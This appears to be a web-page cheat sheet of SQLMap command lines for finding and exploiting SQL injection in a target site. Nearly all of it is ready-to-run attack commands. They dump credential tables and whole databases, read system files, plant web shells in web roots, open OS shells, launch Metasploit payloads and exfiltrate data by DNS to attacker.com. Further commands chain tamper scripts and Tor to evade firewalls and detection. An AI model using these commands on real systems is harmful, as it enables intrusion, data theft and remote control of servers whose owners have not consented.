SQLMap automates SQL injection detection and exploitation. Knowing its options deeply separates a quick scan from a thorough assessment.
Basic Syntax
sqlmap -u "https://target.com/page?id=1"
sqlmap -u "https://target.com/login" --data="user=admin&pass=test"
sqlmap -r request.txt
sqlmap -u "https://target.com/page" --cookie="session=abc123; id=1*"
sqlmap -u "https://target.com/page" -H "User-Agent: *" sqlmap -u "https://target.com/page" -H "X-Forwarded-For: 127.0.0.1*"
|
Detection & Tuning
sqlmap -u "https://target.com/?id=1" --level=5 --risk=3
sqlmap -u "https://target.com/?id=1&cat=2" -p id sqlmap -u "https://target.com/?id=1&cat=2" -p "id,cat"
sqlmap -u "URL" --dbms=mysql sqlmap -u "URL" --dbms=mssql sqlmap -u "URL" --dbms=oracle sqlmap -u "URL" --dbms=postgresql sqlmap -u "URL" --dbms=sqlite
sqlmap -u "URL" --technique=BEUSTQ
sqlmap -u "URL" --union-cols=5 sqlmap -u "URL" --union-char="NULL"
sqlmap -u "URL" --prefix="'" --suffix="-- -"
|
Enumeration
sqlmap -u "URL" --banner
sqlmap -u "URL" --current-db
sqlmap -u "URL" --current-user
sqlmap -u "URL" --is-dba
sqlmap -u "URL" --dbs
sqlmap -u "URL" -D target_db --tables
sqlmap -u "URL" -D target_db -T users --columns
sqlmap -u "URL" -D target_db -T users --dump
sqlmap -u "URL" -D target_db -T users -C "username,password" --dump
sqlmap -u "URL" --dump-all
sqlmap -u "URL" --search -C password sqlmap -u "URL" --search -T users
sqlmap -u "URL" -D db -T users --count
|
Authentication
sqlmap -u "URL" --auth-type=Basic --auth-cred="user:pass"
sqlmap -u "URL" --auth-type=Digest --auth-cred="user:pass"
sqlmap -u "URL" --cookie="PHPSESSID=abc123; token=xyz"
sqlmap -u "URL" -H "Authorization: Bearer JWT_TOKEN"
sqlmap -u "URL" --data="user=admin&pass=test" \ --cookie="session=abc123"
sqlmap -u "https://target.com/login" \ --data="username=admin&password=admin" \ -H "Referer: https://target.com/login" \ --second-url="https://target.com/profile?id=1"
|
Tamper Scripts (WAF Bypass)
sqlmap --list-tampers
sqlmap -u "URL" --tamper=space2comment
sqlmap -u "URL" --tamper=between
sqlmap -u "URL" --tamper=randomcase
sqlmap -u "URL" --tamper=charencode
sqlmap -u "URL" --tamper=charunicodeescape
sqlmap -u "URL" --tamper=equaltolike
sqlmap -u "URL" --tamper=base64encode
sqlmap -u "URL" --tamper=hex2char
sqlmap -u "URL" --tamper=space2comment,randomcase,charencode
sqlmap -u "URL" --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,ifnull2ifisnull,space2comment
sqlmap -u "URL" --tamper=between,charencode,randomcase,space2comment
|
OS Interaction
Requires DBA privileges:
sqlmap -u "URL" --file-read="/etc/passwd" sqlmap -u "URL" --file-read="C:/Windows/win.ini"
sqlmap -u "URL" --file-write=shell.php --file-dest="/var/www/html/shell.php" sqlmap -u "URL" --file-write=cmd.aspx --file-dest="C:/inetpub/wwwroot/cmd.aspx"
sqlmap -u "URL" --os-cmd="whoami" sqlmap -u "URL" --os-shell
sqlmap -u "URL" --dns-domain=attacker.com
sqlmap -u "URL" --os-pwn sqlmap -u "URL" --msf-path=/usr/bin/
|
Proxies & Logging
sqlmap -u "URL" --proxy="http://127.0.0.1:8080"
sqlmap -u "URL" --tor --tor-type=SOCKS5 --check-tor
sqlmap -u "URL" --random-agent
sqlmap -u "URL" --user-agent="Mozilla/5.0 ..."
sqlmap -u "URL" --output-dir=/tmp/sqlmap_out
sqlmap -u "URL" --traffic-file=traffic.log
sqlmap -u "URL" -v 3 sqlmap -u "URL" -v 6
sqlmap -u "URL" --batch
sqlmap -u "URL" -D db -T users --dump --csv
|
Burp Request Integration
cat request.txt POST /login HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded
username=admin*&password=test
sqlmap -r request.txt -p username --level=3 --risk=2 --batch --dbs
|
Blind SQLi Tuning
sqlmap -u "URL" --technique=T --time-sec=5
sqlmap -u "URL" --technique=T --time-sec=10
sqlmap -u "URL" --timeout=30 --retries=5
sqlmap -u "URL" --technique=B
sqlmap -u "URL" --technique=BE --level=2 --risk=1
sqlmap -u "URL" -D db -T users --dump --start=1 --stop=100
|
Second-Order SQLi
sqlmap -u "https://target.com/register" \ --data="username=admin&email=test@test.com" \ --second-url="https://target.com/profile/admin"
sqlmap -r register_request.txt --second-req=profile_request.txt
|
WAF Detection & Evasion
sqlmap -u "URL" --identify-waf
sqlmap -u "URL" --delay=2 sqlmap -u "URL" --safe-freq=3 sqlmap -u "URL" --safe-url="https://target.com/"
sqlmap -u "URL" -H "Transfer-Encoding: chunked"
sqlmap -u "URL" --keep-alive
sqlmap -u "URL" --check-waf
sqlmap -u "URL" \ --random-agent \ --delay=1 \ --tamper=space2comment,randomcase \ --level=3 --risk=2 \ --batch
|
No comments yet. Be the first.